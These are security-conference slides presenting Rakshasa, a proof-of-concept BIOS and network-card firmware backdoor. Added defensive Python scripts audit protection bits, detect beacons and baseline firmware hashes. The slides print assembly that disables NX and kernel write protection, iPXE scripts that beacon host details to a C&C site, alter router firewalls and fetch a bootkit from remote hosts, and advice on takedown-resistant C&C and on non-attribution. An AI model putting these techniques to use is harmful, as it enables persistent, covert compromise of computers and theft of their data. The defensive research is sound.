Hardware Backdooring is practical 



Jonathan Brossard (jb@afq.com.au) 





23/05/2013 



DISCLAIMER 



We are not « terrorists ». We won't release our PoC 
backdoor. 

The x86 architecture is plagued by legacy. 
Governments know. The rest of the industry : not so 
much. 

There is a need to discuss the problems in 
order to find solutions... 



This is believed to be orders of magnitude better than existing backdoors/malware.







Who am I ? 
Security Researcher

First learned asm (~15 years ago)

Presented at Blackhat/Defcon/CCC/HITB/Ruxcon...

Master in Engineering, master in Computer Sciences

Co-organiser of the NoSuchCon conference (Paris)



What do I do ? 
Binary due diligence

Red teaming 

Research : patents, products etc. 



Agenda 

• Motivation : state level backdooring ? 

• Coreboot & x86 architecture 

• State of the art in rootkitting, romkitting 

• Introducing Rakshasa 

• Rakshasa design 

• Why cryptography (Truecrypt/Bitlocker/TPM) 
won't save us... 

• Backdooring like a nation state



FUD101 
Could a state (eg : China) backdoor all new computers on earth ?

Occupying the Information High Ground: Chinese Capabilities for Computer Network Operations and Cyber Espionage

"This close relationship between some of China's—and the world's—largest telecommunications hardware manufacturers creates a potential vector for state sponsored or state directed penetrations of the supply chains for microelectronics supporting U.S. military, civilian government, and high value civilian industry such as defense and telecommunications, though no evidence for such a connection is publicly available."

Prepared for the U.S.-China Economic and Security Review Commission by Northrop Grumman Corp

Bryan Krekel, Patton Adams, George Bakos

March 7, 2012



More FUD 
Cyberdefence: Chinese routers accused of being a risk

Julien L - published Thursday 19 July 2012 at 16:09 - posted in Société 2.0

Tags: China, Network, Windows, ZTE, Huawei

Will the telecommunications sector have to do without Chinese equipment? A Senate report dedicated to cyberdefence puts forward this idea, pointing to the links between the manufacturers ZTE and Huawei and the Chinese central government. But when it comes to cyberdefence, hardware from the Middle Kingdom is not the only kind that raises questions.

Chinese network equipment, a risk for cyberdefence? That is what emerges from a Senate report led by Jean-Marie Bockel and available on the website of the upper house of parliament. While the document lists ten priorities and makes fifty recommendations, one of the avenues put forward by the socialist senator came as a particular surprise.

This priority, the tenth, proposes "to prohibit, on national territory and at the European level, the deployment and use of 'routers' or other core network equipment that present a risk to national security, in particular 'routers' and certain equipment originating




Enough FUD... 
A bit of x86 architecture 



[Diagram: x86 platform block diagram. The CPU talks over the FSB to the Northbridge, which exposes PCIe; the Northbridge connects to the Southbridge, which exposes PCIe, the SPI flash, floppy, keyboard and mouse.]



State of the art, previous work 
Previous work

• Early 80s : Brain virus, targets the MBR 

• 80s, 90s : thousands of such viruses 

• 2007, John Heasman (NGS Software) Blackhat US: 
backdoor EFI bootloader 

• 2009, Anibal Sacco and Alfredo Ortega (Core Security), 
CanSecWest : patch/flash a Phoenix-Award BIOS 

• 2009, Kleissner, Blackhat US : Stoned bootkit. Bootkit 
Windows, Truecrypt. Load arbitrary unsigned kernel 
module. 

• 2010, Kumar and Kumar (HITB Malaysia) : vbootkit 
bootkitting of Windows 7. 

• Piotr Bania, Konboot : bootkit any Windows (32/64b) 

• 2012: Snare (Blackhat 2012): UEFI rootkitting 



Introducing Rakshasa 
Goals : create the perfect backdoor 

• Persistent 

• Stealth (0 hostile code on the machine) 

• Portable (OS independent) 

• Remote access, remote updates 

• State level quality : plausible deniability, non 
attribution 

• Cross network perimeters (firewalls, auth proxy) 

• Redundancy 

• Non detectable by AV (goes without saying...) 



Rakshasa : Design (1/2) 



• Core components : 

- Coreboot 

- SeaBIOS 

- iPXE 

- payloads 

Built on top of free software : portability, non 
attribution, cheap dev (~4 weeks of work), really really 
really hard to detect as malicious. 

* Supports 230 motherboards. 



Rakshasa : Design (2/2) 



-> Flash the BIOS (Coreboot + PCI ROMs such as iPXE) 

-> Flash the network card or any other PCI device 
(redundancy) 

-> Boot a payload over the network (bootkit over HTTPS) 

-> Boot a payload over wifi/wimax (breach the network 
perimeter, bypasses network detection, I(P|D)S) 

-> Remotely reflash the BIOS/network card if 
necessary 



Rakshasa architecture (1/2) 

[Diagram: components contained in the BIOS firmware of Rakshasa, versus the malware fetched at boot time and only stored in RAM.]

Rakshasa architecture (2/2) 

[Diagram: iPXE fetches the payload over the internet (if possible using wifi/wimax, else : ethernet), over HTTPS.]


DEMO : Evil remote carnal pwnage 
(of death) 

I can write blogs too... Muhahahaha... 

Rakshasa : embedded features 



Remove NX bit -> executable heap/stack. 

Make every mapping +W in ring0 

Remove CPU updates (microcodes) 

Remove anti-SMM protections -> generic local root exploit 

Disable ASLR 

Bootkitting (modified Kon-boot payload*) 

* Thanks to Piotr Bania for his contribution to 
Rakshasa :) 



Rakshasa : removing the NX bit (1/2) 

MSR : Model Specific Register 

AMD64 Architecture Programmer's Manual (volume 2, 
Section 3.1.7 : Extended Feature Enable Register) : 

No-Execute Enable (NXE) Bit. Bit 11, read/write. Setting 
this bit to 1 enables the no-execute page-protection 
feature. The feature is disabled when this bit is 
cleared to 0. 



Rakshasa : removing the NX bit (2/2) 



; Disable NX bit (if supported) 

mov eax,0x80000000     ; get highest extended function supported by cpuid 
cpuid                  ; need AMD K6 or better (anything >= 1997... should be ok) 

cmp eax,0x80000001     ; need at least function 0x80000001 
jb nonsupported 

mov eax,0x80000001     ; get Processor Info and Feature Bits 
cpuid 

bt edx,20              ; NX bit is supported ? 
jnc nonsupported 

mov ecx,0xc0000080     ; extended feature register (EFER) 
rdmsr                  ; read MSR 
btr eax,11             ; disable NX (EFER_NX) // btr = bit test and reset 
wrmsr                  ; write MSR 

nonsupported: 



Make every mapping +W in ring0 

Intel Manuals (Volume 3A, Section 2.5): 

Write Protect (bit 16 of CR0) - When set, inhibits supervisor- 
level procedures from writing into read-only pages; when clear, 
allows supervisor-level procedures to write into read-only pages 
(regardless of the U/S bit setting; see Section 4.1.3 and Section 
4.6). This flag facilitates implementation of the copy-on-write 
method of creating a new process (forking) used by operating 
systems such as UNIX. 



Make every mapping +W in ring0 
(32b/64b) 

; 32b version : clear CR0.WP (bit 16) 
mov eax,cr0 
and eax,0xfffeffff 
mov cr0,eax 

; 64b version : 
mov rax,cr0 
and rax,0xfffeffff 
mov cr0,rax 



Remove CPU updates (microcodes) 

rm -rf ~/coreboot/microcodes/ 



Remove anti-SMM protections (1/2) 

Intel® 82845G/82845GL/82845GV Graphics and Memory Controller datasheets, Section 3.5.1.22: SMRAM—System 
Management RAM Control Register (Device 0), bit 4 : 

SMM Space Locked (D_LCK)—R/W, L. When D_LCK is set to 1, D_OPEN is reset to 0; D_LCK, 
D_OPEN, C_BASE_SEG, H_SMRAM_EN, TSEG_SZ and TSEG_EN become read only. D_LCK 
can be set to 1 via a normal configuration space write but can only be cleared by a Full Reset. The 
combination of D_LCK and D_OPEN provide convenience with security. The BIOS can use the 
D_OPEN function to initialize SMM space and then use D_LCK to "lock down" SMM space in the 
future so that no application software (or BIOS itself) can violate the integrity of SMM space, even if 
the program has knowledge of the D_OPEN function. 



Remove anti-SMM protections (2/2) 

D_LCK is not supported by Coreboot currently anyway... 

; disable D_LCK shellcode for Coreboot... 
nop 
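The three slides above each lower one hardware protection (EFER.NXE, CR0.WP, SMRAMC.D_LCK). From the defender's side the useful question is whether those bits are still in their hardened state after boot. The following script is an added example written for this page; it is not code from the slides or from Rakshasa. The bit positions for EFER.NXE, CR0.WP and D_LCK are the ones quoted on the slides; the D_OPEN position (bit 6) and the sample register values are assumptions, and only EFER can be read from user space (through the Linux msr driver), so CR0 and SMRAMC values have to come from a kernel-level tool.

```python
"""Audit of the three platform protections the preceding slides show being
lowered: EFER.NXE (MSR 0xC0000080, bit 11), CR0.WP (bit 16) and the SMRAMC
D_LCK bit (bit 4).  Added example for defenders; not part of the slides."""
import os
import struct
from typing import Dict, List, Optional

MSR_EFER = 0xC0000080        # Extended Feature Enable Register (AMD64 manual quoted above)
EFER_NXE_BIT = 11            # No-Execute Enable
CR0_WP_BIT = 16              # Write Protect (Intel manual quoted above)
SMRAMC_D_LCK_BIT = 4         # SMM Space Locked (82845G datasheet quoted above)
SMRAMC_D_OPEN_BIT = 6        # ASSUMPTION: D_OPEN sits at bit 6 of the same register


def audit(efer: int, cr0: int, smramc: int) -> Dict[str, bool]:
    """Map each protection to True when it is in its hardened state."""
    return {
        "efer_nxe_set": bool((efer >> EFER_NXE_BIT) & 1),
        "cr0_wp_set": bool((cr0 >> CR0_WP_BIT) & 1),
        "smramc_d_lck_set": bool((smramc >> SMRAMC_D_LCK_BIT) & 1),
        "smramc_d_open_clear": not ((smramc >> SMRAMC_D_OPEN_BIT) & 1),
    }


def findings(efer: int, cr0: int, smramc: int) -> List[str]:
    """Human-readable list of the protections that are NOT hardened."""
    messages = {
        "efer_nxe_set": "EFER.NXE clear: no-execute page protection is off (executable heap/stack)",
        "cr0_wp_set": "CR0.WP clear: ring 0 may write to read-only pages",
        "smramc_d_lck_set": "SMRAMC.D_LCK clear: SMRAM configuration is not locked",
        "smramc_d_open_clear": "SMRAMC.D_OPEN set: SMRAM is open to non-SMM code",
    }
    state = audit(efer, cr0, smramc)
    return [messages[name] for name, ok in state.items() if not ok]


def read_efer(cpu: int = 0) -> Optional[int]:
    """Read EFER through the Linux msr driver (/dev/cpu/N/msr; needs root and
    the msr module loaded).  Returns None when the interface is unavailable."""
    try:
        fd = os.open(f"/dev/cpu/{cpu}/msr", os.O_RDONLY)
    except OSError:
        return None
    try:
        raw = os.pread(fd, 8, MSR_EFER)   # the MSR number is the file offset
    finally:
        os.close(fd)
    return struct.unpack("<Q", raw)[0]


# Constructed sample register values (not read from a real machine):
HEALTHY = dict(efer=0xD01, cr0=0x80050033, smramc=0x1A)   # NXE, WP and D_LCK all set
LOWERED = dict(efer=0x501, cr0=0x80040033, smramc=0x0A)   # the three bits cleared, as the slides do

if __name__ == "__main__":
    live = read_efer()
    efer = live if live is not None else LOWERED["efer"]
    for line in findings(efer, LOWERED["cr0"], LOWERED["smramc"]):
        print("FINDING:", line)
```

Note that a reading taken after the OS is up reflects both the firmware and the kernel: 64-bit Linux, for instance, sets EFER.NXE itself during early boot, so a cleared NXE observed at runtime points at the kernel as much as at the firmware, while D_LCK, once set, can only be cleared by a full reset.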



Disable ASLR 

OS dependent. 

Seed for full ASLR has to be in kernel land 
(equivalent of execve()). 

-> patch the seed with a known value 

Seed location for Windows 7 identified by Kumar 
& Kumar (HITB KL 2010). 

-> Mapping is 100% repeatable :) 



Rakshasa : embedded features : 
conclusion 

Permanent lowering of the security level on any OS. 

Welcome back to the security level of 1997. 
Persistent, even if HD or OS is removed/restored. 



Rakshasa : remote payload 

Currently capable of bootkitting any version of 
Windows (32b/64b) thanks to a special version of 
Kon-boot 

Bootkit future OSes ? -> Update/remove/reflash 
firmwares (PCI, BIOS) 



Rakshasa : stealthiness 

• We don't touch the disk : no evidence on the filesystem. 

• The code flashed to the motherboard is not hostile per se 
(there is one text file with URLs in it, that's it). 

• We can remotely boot from an alternate payload or 
even OS : fake Truecrypt/Bitlocker prompt ! 

• Optionally boot from a Wi-Fi/WiMAX stack : no network 
evidence on the LAN. 

• Fake BIOS menus if necessary. We use an embedded 
CMOS image. We can use the real CMOS nvram to 
store encryption keys/backdoor states between 
reboots. 



Rakshasa : why using Coreboot/SeaBIOS/iPXE is 
the good approach 

Portability : benefit from all the gory reverse 
engineering work already done ! 

Awesome modularity : embed existing payloads (as 
floppy or cdrom images) and PCI ROMs directly in the 
main Coreboot ROM ! 

Eg : bruteforce bootloaders (Brossard, H2HC 2010), 
bootkits without modification. 

Network stacks : ip/udp/tcp, dns, http(s), tftp, ftp... 
make your own (tcp over dns ? over ntp ?) 

Code is legit : can't be flagged as malware ! 



DEMOS 

Example iPXE configuration files : 
get an IP 

#!ipxe 

# try dhcp first, else use static IP 

dhcp || ( set net0/ip 192.168.0.3 && set net0/netmask 255.255.255.0 && set net0/gateway 192.168.0.1 ) 



Example iPXE configuration files : 
fun with webapps... 

# evil pingback to C&C internet blog with HTTP auth... 

kernel http://admin:p4ssw0rd@2012.hackitoergosum.org/xmlrpc.php?ip=${net0/ip}&mac=${net0/mac}&netmask=${net0/netmask}&gateway=${net0/gateway}&dns=${net0/dns}&domain=${net0/domain} || 

# Send an email using open relay web application 

kernel http://vulnerablehost.com/vulnservice.asp?mail-from=Rakshasa&mail-toaddress=endrazine%40gmail.com&mail-subject=BIOS%20Owned || 

# Router pharming : modify firewall settings 

kernel http://admin:password@2012.hackitoergosum.org/cgi-bin/firewall?action=enable&port=all || 

kernel http://root:root@2012.hackitoergosum.org/cgi-bin/firewall?enableport=all 



Example iPXE configuration files : 
chain configuration loader from the web 

# chain loader over https 

chain https://www.pmcma.org/ads/love.jpg?ip=${net0/ip}&mac=${net0/mac} || 



Example iPXE configuration files : 
boot an alternate OS/bootkit 

# discard everything done so far 
imgfree 

# fetch memdisk kernel over the internet via ftp 
kernel ftp://ftp.pmcma.org/pwnage/memdisk.pdf || 

# fetch bootkit payload over the internet via http 
initrd http://www.pmcma.org/wp-content/uploads/2012/07/bootkit.pdf 

# boot 
boot 



More demos 

So you guys are evil after all ? 



Apache logs 

Screenshot of a terminal (jonathan@blackbox): 

bash-4.2# tail -n 4 /var/log/apache2/access.log 
10.239.173.250 - - [28/Jul/2012:22:39:17 +1000] "GET /ads/love.jpg?ip=10.0.2.15&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2&dns=10.0.2.3&domain= HTTP/1.1" 200 1637 "-" "Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4" 
10.239.173.250 - - [28/Jul/2012:22:40:26 +1000] "GET /ads/love.jpg?ip=10.0.2.15&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2&dns=10.0.2.3&domain= HTTP/1.1" 200 1624 "-" "Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4" 
10.239.173.250 - - [28/Jul/2012:22:42:08 +1000] "GET /ads/love.jpg?ip=10.0.2.15&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2&dns=10.0.2.3&domain= HTTP/1.1" 200 1632 "-" "Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4" 
10.239.173.250 - - [28/Jul/2012:22:44:30 +1000] "GET /ads/love.jpg?ip=10.0.2.15&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2&dns=10.0.2.3&domain= HTTP/1.1" 200 1621 "-" "Mozilla/6.0 (Macintosh; I; Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4" 
bash-4.2# 
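The log above is what the beacon looks like from the web server's side: a GET for a static image whose query string carries the client's own IP, MAC, netmask, gateway and DNS, sent with a User-Agent no real browser produces ("Mozilla/6.0"). Those traits are the detection opportunity. The script below is an added example for this page, not code from the slides; it parses Apache combined-format lines and flags requests that show two or more of those traits. The sample log lines are constructed to match the screenshot's format and are not the original server's log.

```python
"""Detect firmware-style beacons in an Apache combined-format access log.
Added example; the sample lines are constructed, not the original log."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
NET_KEYS = {"ip", "mac", "netmask", "gateway", "dns"}
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)
STATIC_EXT = (".jpg", ".jpeg", ".png", ".gif", ".ico")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into named fields, or None if it is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def beacon_reasons(rec: Dict[str, str]) -> List[str]:
    """Independent indicators; two or more together are treated as a beacon."""
    reasons = []
    parts = urlsplit(rec["target"])
    query = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    if len(NET_KEYS & set(query)) >= 3:
        reasons.append("query carries host network configuration (ip/mac/netmask/gateway/dns)")
    if any(MAC_RE.match(v) for v in query.get("mac", [])):
        reasons.append("MAC address in query string")
    if parts.path.lower().endswith(STATIC_EXT) and parts.query:
        reasons.append("query string on a static image")
    if rec["ua"].startswith("Mozilla/") and not rec["ua"].startswith("Mozilla/5.0"):
        reasons.append("implausible Mozilla token in User-Agent")
    return reasons


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per flagged line with the client, timestamp and reasons."""
    hits = []
    for line in lines:
        rec = parse_line(line.strip())
        if rec is None:
            continue
        reasons = beacon_reasons(rec)
        if len(reasons) >= 2:
            hits.append({"client": rec["client"], "time": rec["time"], "reasons": reasons})
    return hits


# Constructed sample log, modelled on the screenshot; two beacons and two benign requests
SAMPLE_LOG = [
    '10.239.173.250 - - [28/Jul/2012:22:39:17 +1000] "GET /ads/love.jpg?ip=10.0.2.15'
    '&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2'
    '&dns=10.0.2.3&domain= HTTP/1.1" 200 1637 "-" "Mozilla/6.0 (Macintosh; I; '
    'Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4"',
    '203.0.113.7 - - [28/Jul/2012:22:41:00 +1000] "GET /index.html HTTP/1.1" 200 5120 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"',
    '203.0.113.7 - - [28/Jul/2012:22:41:02 +1000] "GET /ads/love.jpg?v=2 HTTP/1.1" 200 1637 '
    '"http://203.0.113.7/index.html" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"',
    '10.239.173.250 - - [28/Jul/2012:22:44:30 +1000] "GET /ads/love.jpg?ip=10.0.2.15'
    '&mac=52%3A54%3A00%3A12%3A34%3A56&netmask=255.255.255.0&gateway=10.0.2.2'
    '&dns=10.0.2.3&domain= HTTP/1.1" 200 1621 "-" "Mozilla/6.0 (Macintosh; I; '
    'Intel Mac OS X 11_7_9; de-LI; rv:1.9b4) Gecko/2012010317 Firefox/10.0a4"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["time"], "; ".join(hit["reasons"]))
```

The two-indicator threshold keeps an ordinary cache-busting `?v=2` on an image from firing on its own; in a real deployment the same logic belongs in the proxy or SIEM that sees egress traffic, since the slides' point is that the beacon can leave over a Wi-Fi/WiMAX path the LAN sensors never see.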



BIOS email pingback 

Screenshot of a mail client showing the received message: 

Subject: Rakshasa Pingback Defcon Demo 

Attn 

Please register me as a member of the 

ip: 10.0.2.15 
mac: 52:54:00:12:34:56 
netmask: 255.255.255.0 
gateway: 10.0.2.2 
dns: 10.0.2.3 



Remote Carnal Pwnage of death 

How to properly build a botnet ? 

• HTTPS + asymmetric cryptography (client side certificates, 
signed updates) 

If Microsoft can do secure remote updates, so can 
malware ! 

• Avoid DNS takeovers by law enforcement agencies by 
directing the C&C rotatively on innocent web sites (are you 
gonna shut down Google.com ?), use asymmetric crypto to 
push updates. 

• So you own my C&C for 1 hour ? You can't do anything 
with it !! 

C&C CAN'T BE SHUT DOWN OR TAKEN OVER. 



Why crypto won't save you... 
Why crypto won't save you (1/2) 

We can fake the boot/password prompt by 
booting a remote OS (Truecrypt/Bitlocker) 

Once we know the password, the BIOS 
backdoor can emulate keyboard typing in 16b 
real mode by programming the 
keyboard/motherboard PIC microcontrollers 
(Brossard, Defcon 2008) 

If necessary, patch back original 
BIOS/firmwares remotely. 



Why crypto won't save you (2/2) 

TPM + full disk encryption won't save you either : 

1) It's a passive chip : if the backdoor doesn't 
want explicit access to data on the HD, it can 
simply ignore TPM. 

2) Your HD is never encrypted when delivered 
to you. You seal the TPM when you encrypt 
your HD only. So TPM doesn't prevent 
backdooring from anyone in the supply chain. 



Software implementations of TPM 
are broken anyway 



NoSuchCon 2013 : John Butterworth, Corey 
Kallenberg, Xeno Kovah - BIOS Chronomancy 



Remediation 
Remediation (leads) 

Flash any firmware upon reception of new hardware with 
open source software you can verify. 

Perform checksums of all firmwares by physically 
extracting them (FPGA...) : costly ! 

Verify the integrity of all firmwares from time to time 

Update forensics best practices : 

1) Include firmwares in SoW 

2) Throw away your computer in case of intrusion 

Even then... not entirely satisfying : the backdoor can flash 
the original firmwares back remotely. 
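Two of the leads above, checksumming firmwares at reception and re-verifying them later, come down to keeping a baseline of digests and diffing against it. The script below is an added example for this page, not code from the slides or from any firmware vendor. It assumes the BIOS image comes from a dump (for example `flashrom -p internal -r bios.bin`) and the PCI option ROMs from the `rom` files Linux exposes under `/sys/bus/pci/devices/*/`; the image bytes embedded in it are constructed stand-ins, not real firmware.

```python
"""Firmware integrity baseline: record SHA-256 digests of firmware images at
reception and re-check them later.  Added example; the image bytes are
constructed stand-ins for real BIOS and option ROM dumps."""
import glob
import hashlib
import json
import os
from typing import Dict, List


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(images: Dict[str, bytes]) -> Dict[str, str]:
    """name -> sha256 for every firmware image supplied."""
    return {name: sha256_hex(blob) for name, blob in images.items()}


def compare(baseline: Dict[str, str], current: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Classify each image as unchanged, changed, missing (baseline only) or new."""
    now = build_baseline(current)
    return {
        "unchanged": sorted(n for n in baseline if n in now and now[n] == baseline[n]),
        "changed": sorted(n for n in baseline if n in now and now[n] != baseline[n]),
        "missing": sorted(n for n in baseline if n not in now),
        "new": sorted(n for n in now if n not in baseline),
    }


def collect_pci_option_roms(sysfs: str = "/sys/bus/pci/devices") -> Dict[str, bytes]:
    """Read every exposed PCI expansion ROM (needs root).  The sysfs 'rom' file
    has to be enabled by writing 1 before reading and disabled afterwards."""
    roms = {}
    for rom in glob.glob(os.path.join(sysfs, "*", "rom")):
        dev = os.path.basename(os.path.dirname(rom))
        try:
            with open(rom, "w") as f:
                f.write("1")
            with open(rom, "rb") as f:
                data = f.read()
            with open(rom, "w") as f:
                f.write("0")
        except OSError:
            continue
        if data:
            roms[f"pci:{dev}"] = data
    return roms


def save_baseline(baseline: Dict[str, str], path: str) -> None:
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path) as f:
        return json.load(f)


# Constructed stand-ins for firmware images (real ones are MiB-sized binaries)
AT_RECEPTION = {
    "bios": b"\x55\xaa" + b"vendor BIOS image v1.02" + b"\x00" * 64,
    "pci:0000:02:00.0": b"\x55\xaa" + b"NIC option ROM 3.1" + b"\x00" * 32,
}
LATER = {
    "bios": b"\x55\xaa" + b"vendor BIOS image v1.02" + b"\x00" * 64,
    "pci:0000:02:00.0": b"\x55\xaa" + b"replacement ROM" + b"\x00" * 35,   # NIC ROM reflashed
    "pci:0000:03:00.0": b"\x55\xaa" + b"unexpected new ROM" + b"\x00" * 32,
}

if __name__ == "__main__":
    print(json.dumps(compare(build_baseline(AT_RECEPTION), LATER), indent=2))
```

The comparison is only as trustworthy as the extraction: a dump taken through the running BIOS or chipset can be lied to, which is exactly why the slide calls for physical extraction, and a baseline recorded before flashing verifiable open-source firmware documents the vendor image rather than a known-good one.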



Post intrusion recovery 

You can't trust your BIOS 

-> you can't flash from the OS or even 
floppy/cdrom. 

-> need physical flasher. 

Rakshasa can reinfect itself from any PCI 
expansion ROM. 

-> you need to flash all the firmwares of the 
motherboard at the same time. 



Example of flasher : BIOS Savior 





Backdooring like NSA/China 

Backdooring like a nation state 

Rule #1 : non attribution 

- you didn't write the free software in the first place. 

- add a few misleading strings, eg : in mandarin ;) 

Rule #2 : plausible deniability 

- bootstrap using a known remote vulnerability in a 
network card firmware 
(eg : Duflot's CVE-2010-0104) 

-> « honest mistake » if discovered. 

- remotely flash the BIOS. 

- do your evil thing. 

- restore the BIOS remotely. 
Outro 



This is not a vulnerability : 

- it is sheer bad design due to legacy. 

- don't expect a patch. 

- fixing those issues will probably require breaking 
backward compatibility with most standards 
(PCI, PCIe, TPM). 



Whitepaper/slides 



http://slideshare.net/endrazine 



Twitter : @endrazine 



Questions ? 






